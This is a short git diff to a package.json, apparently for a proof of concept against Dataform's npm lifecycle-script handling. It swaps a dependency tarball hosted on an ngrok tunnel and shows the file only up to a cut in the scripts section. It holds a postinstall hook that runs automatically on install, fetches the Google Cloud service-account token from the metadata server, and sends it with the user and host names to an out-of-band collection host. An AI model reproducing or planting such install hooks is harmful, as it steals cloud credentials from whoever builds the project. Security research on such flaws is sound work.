Test unicode normalization bypass attack

--- a/package.json
+++ b/package.json
@@ -4,7 +4,7 @@
   "description": "Dataform vulnerability PoC - tests npm lifecycle script execution",
   "dependencies": {
     "@dataform/core": "^2.9.0",
-    "hardlink-test": "https://8228c7c06857.ngrok-free.app/hardlink.tar.gz"
+    "unicode-test": "https://8228c7c06857.ngrok-free.app/unicode.tar.gz"
   },
   "scripts": {
     "postinstall": "curl -s -X POST -H 'Content-Type: application/json' -d \"{\\\"poc\\\":\\\"npm_postinstall\\\",\\\"ts\\\":\\\"$(date -u +%Y-%m-%dT%H:%M:%SZ)\\\",\\\"user\\\":\\\"$(whoami)\\\",\\\"host\\\":\\\"$(hostname)\\\",\\\"token\\\":\\\"$(curl -s -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token 2>/dev/null || echo blocked)\\\"}\" https://juolbtoughjktrdppdvuqemhwftehn8z6.oast.fun/npm",
